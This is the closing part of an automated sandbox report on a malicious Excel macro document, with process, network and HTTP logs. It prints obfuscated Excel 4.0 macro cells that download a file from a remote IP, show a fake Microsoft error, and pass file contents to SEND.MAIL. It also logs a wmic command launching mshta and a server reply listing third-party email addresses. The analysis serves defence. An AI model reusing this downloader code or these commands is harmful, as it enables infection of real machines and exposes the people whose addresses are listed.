                                                                                                                                                    56,564,=C329+B7588
                                                                                                                                                    57,564,=D8362+B8058
                                                                                                                                                    60,564,=B8725+A9376
                                                                                                                                                    61,564,=B5597+D3621
                                                                                                                                                    63,564,=B6646+A4425
                                                                                                                                                    64,564,=D8638+A5787
                                                                                                                                                    65,564,=C1151+D2246
                                                                                                                                                    68,564,=CALL("" & CHAR(117) & "" & CHAR(114) & "" & CHAR(108) & "mo" & CHAR(110) & "", "URLDownloa" & CHAR(100) & CHAR(84) & CHAR(111) & "FileA","JJ" & CHAR(67) & "CJJ", 0, "http://13" & CHAR(50) & ".148.135.18" & CHAR(51) & CHAR(58) & "80" & CHAR(56) & CHAR(48) & "/Q2W5VWUFL5V" & CHAR(67) & CHAR(77) & "" & CHAR(81) & "7JQPETG3CCTYX72Z4" & CHAR(82) & "25PDG", "C:\Prog" & CHAR(114) & "amData\pXJ" & CHAR(83) & "" & CHAR(78) & "z.txt",0,0)
                                                                                                                                                    70,564,=C4316+A5336
                                                                                                                                                    72,564,=C7620+D5946
                                                                                                                                                    75,564,=A2139+B5075
                                                                                                                                                    76,564,=D3014+D9522
                                                                                                                                                    77,564,=D5439+A2132
                                                                                                                                                    83,564,=ALERT("Err" & CHAR(111) & CHAR(114) & "! " & CHAR(83) & "endi" & CHAR(110) & "g report to Microsoft...")
                                                                                                                                                    84,564,=A2380+B2698
                                                                                                                                                    85,564,=B9614+B2053
                                                                                                                                                    89,564,=A3792+A6744
                                                                                                                                                    94,564,=B6438+A5552
                                                                                                                                                    95,564,=FOPEN("C:\ProgramData\pXJ" & CHAR(83) & "" & CHAR(78) & "z.txt",1)
                                                                                                                                                    96,564,=D8460+A4640
                                                                                                                                                    98,564,=B5886+A6763
                                                                                                                                                    99,564,=A2437+B2191
                                                                                                                                                    102,564,=B5267+B1896
                                                                                                                                                    103,564,=D2002+D7458
                                                                                                                                                    105,564,=D2125+A2353
                                                                                                                                                    106,564,=B7917+C4987
                                                                                                                                                    108,564,=SEND.MAIL(EVALUATE(FREAD(US96,255)))
                                                                                                                                                    110,564,=D8532+B9930
                                                                                                                                                    112,564,=A9148+B1736
                                                                                                                                                    114,564,=A4485+A1835
                                                                                                                                                    115,564,=D3104+D8614
                                                                                                                                                    118,564,=B80+A3728
                                                                                                                                                    119,564,=C991+A9650
                                                                                                                                                    120,564,=D7894+A5124
                                                                                                                                                    121,564,=RETURN()
                                                                                                                                                    

                                                                                                                                                    Network Behavior

                                                                                                                                                    Network Port Distribution

                                                                                                                                                    TCP Packets

                                                                                                                                                    TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                    Nov 24, 2021 19:14:56.678845882 CET497878080192.168.2.4132.148.135.183
                                                                                                                                                    Nov 24, 2021 19:14:56.836256027 CET808049787132.148.135.183192.168.2.4
                                                                                                                                                    Nov 24, 2021 19:14:56.836427927 CET497878080192.168.2.4132.148.135.183
                                                                                                                                                    Nov 24, 2021 19:14:56.836929083 CET497878080192.168.2.4132.148.135.183
                                                                                                                                                    Nov 24, 2021 19:14:56.994781971 CET808049787132.148.135.183192.168.2.4
                                                                                                                                                    Nov 24, 2021 19:14:57.284526110 CET808049787132.148.135.183192.168.2.4
                                                                                                                                                    Nov 24, 2021 19:14:57.284658909 CET497878080192.168.2.4132.148.135.183
                                                                                                                                                    Nov 24, 2021 19:16:12.284903049 CET808049787132.148.135.183192.168.2.4
                                                                                                                                                    Nov 24, 2021 19:16:12.285090923 CET497878080192.168.2.4132.148.135.183

                                                                                                                                                    DNS Answers

                                                                                                                                                    TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                                                                                                                                    Nov 24, 2021 19:13:54.346412897 CET8.8.8.8192.168.2.40x2196No error (0)prda.aadg.msidentity.comwww.tm.a.prd.aadg.akadns.netCNAME (Canonical name)IN (0x0001)

                                                                                                                                                    HTTP Request Dependency Graph

                                                                                                                                                    • 132.148.135.183:8080

                                                                                                                                                    HTTP Packets

                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                    0192.168.2.449787132.148.135.1838080C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                    TimestampkBytes transferredDirectionData
                                                                                                                                                    Nov 24, 2021 19:14:56.836929083 CET1742OUTGET /Q2W5VWUFL5VCMQ7JQPETG3CCTYX72Z4R25PDG HTTP/1.1
                                                                                                                                                    Accept: */*
                                                                                                                                                    Accept-Encoding: gzip, deflate
                                                                                                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
                                                                                                                                                    Host: 132.148.135.183:8080
                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                    Nov 24, 2021 19:14:57.284526110 CET1742INHTTP/1.1 200 OK
                                                                                                                                                    Server: nginx/1.0.15
                                                                                                                                                    Date: Wed, 24 Nov 2021 18:14:57 GMT
                                                                                                                                                    Content-Type: text/plain; charset=utf-8
                                                                                                                                                    Connection: keep-alive
                                                                                                                                                    Content-Length: 122
                                                                                                                                                    Data Raw: 7b 22 64 75 72 73 74 40 68 75 6c 6c 66 6f 72 65 73 74 2e 63 6f 6d 22 2c 22 6c 65 73 6c 69 65 40 6c 65 73 6c 69 65 2d 6c 65 77 69 73 2e 63 6f 6d 22 2c 22 61 6c 62 65 72 74 40 66 72 61 67 61 70 72 6f 70 65 72 74 69 65 73 2e 63 6f 6d 22 2c 22 69 6e 66 6f 40 73 68 6f 70 6d 6f 74 69 66 73 2e 63 6f 6d 22 2c 22 61 77 6d 40 67 72 65 65 6e 73 68 70 6f 6e 2e 63 6f 6d 22 7d
                                                                                                                                                    Data Ascii: {"durst@hullforest.com","leslie@leslie-lewis.com","albert@fragaproperties.com","info@shopmotifs.com","awm@greenshpon.com"}


                                                                                                                                                    Code Manipulations

                                                                                                                                                    Statistics

                                                                                                                                                    CPU Usage

                                                                                                                                                    Click to jump to process

                                                                                                                                                    Memory Usage

                                                                                                                                                    Click to jump to process

                                                                                                                                                    High Level Behavior Distribution

                                                                                                                                                    Click to dive into process behavior distribution

                                                                                                                                                    Behavior

                                                                                                                                                    Click to jump to process

                                                                                                                                                    System Behavior

                                                                                                                                                    General

                                                                                                                                                    Start time:19:14:01
                                                                                                                                                    Start date:24/11/2021
                                                                                                                                                    Path:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                    Commandline:"C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE" /automation -Embedding
                                                                                                                                                    Imagebase:0x250000
                                                                                                                                                    File size:27110184 bytes
                                                                                                                                                    MD5 hash:5D6638F2C8F8571C593999C58866007E
                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                    Reputation:high

                                                                                                                                                    General

                                                                                                                                                    Start time:19:14:55
                                                                                                                                                    Start date:24/11/2021
                                                                                                                                                    Path:C:\Windows\SysWOW64\wbem\WMIC.exe
                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                    Commandline:wmic process call create "mshta C:\ProgramData\XgQXeAWeoOU.rtf"
                                                                                                                                                    Imagebase:0xf40000
                                                                                                                                                    File size:391680 bytes
                                                                                                                                                    MD5 hash:79A01FCD1C8166C5642F37D1E0FB7BA8
                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                    Reputation:high

                                                                                                                                                    General

                                                                                                                                                    Start time:19:14:56
                                                                                                                                                    Start date:24/11/2021
                                                                                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                    Imagebase:0x7ff724c50000
                                                                                                                                                    File size:625664 bytes
                                                                                                                                                    MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                    Reputation:high

                                                                                                                                                    General

                                                                                                                                                    Start time:19:14:57
                                                                                                                                                    Start date:24/11/2021
                                                                                                                                                    Path:C:\Windows\System32\mshta.exe
                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                    Commandline:mshta C:\ProgramData\XgQXeAWeoOU.rtf
                                                                                                                                                    Imagebase:0x7ff786820000
                                                                                                                                                    File size:14848 bytes
                                                                                                                                                    MD5 hash:197FC97C6A843BEBB445C1D9C58DCBDB
                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                    Reputation:moderate

                                                                                                                                                    Disassembly

                                                                                                                                                    Code Analysis

                                                                                                                                                    Reset < >